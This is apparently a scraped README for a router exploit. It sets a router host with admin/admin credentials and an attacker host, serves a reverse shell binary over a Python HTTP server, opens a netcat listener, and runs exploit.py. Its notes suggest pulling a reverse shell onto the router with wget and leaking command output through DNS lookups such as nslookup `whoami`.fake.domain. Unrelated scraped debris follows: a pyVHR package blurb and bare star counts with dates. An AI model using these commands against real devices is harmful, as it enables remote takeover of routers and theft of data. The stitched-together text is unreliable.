# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
Leads for leaking command output
Look for file paths that are displayed within the web interface that command output can be written to. Using /tmp/ping.log to view the output at /Ping.asp.
Use wget to download reverse shell binary to the router.
Config the attacker as the DNS server and force the router to issue DNS requests with the command output. Like nslookup `whoami`.fake.domain
TODOs
Use argparse and make the exploit an executable.
Unsolved Mysteries
If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?
Package pyVHR (short for Python framework for Virtual Heart Rate) is a comprehensive framework for studying methods of pulse rate estimation relying on remote photoplethysmography (rPPG)
16 Jun 17, 2022
1 Nov 15, 2021
2 Jan 10, 2022
261 Jan 03, 2023
1 Nov 07, 2021
2 Nov 15, 2022
134 Jan 09, 2023
1 Feb 05, 2022
968 Dec 29, 2022
12 Mar 23, 2022
4 Dec 06, 2022
31 Nov 01, 2022
3 Apr 05, 2022
8 Nov 04, 2021
13 Dec 16, 2022
108 Jan 04, 2023
106 Dec 27, 2022
139 Jan 02, 2023
6 Dec 11, 2022
1 Jan 25, 2022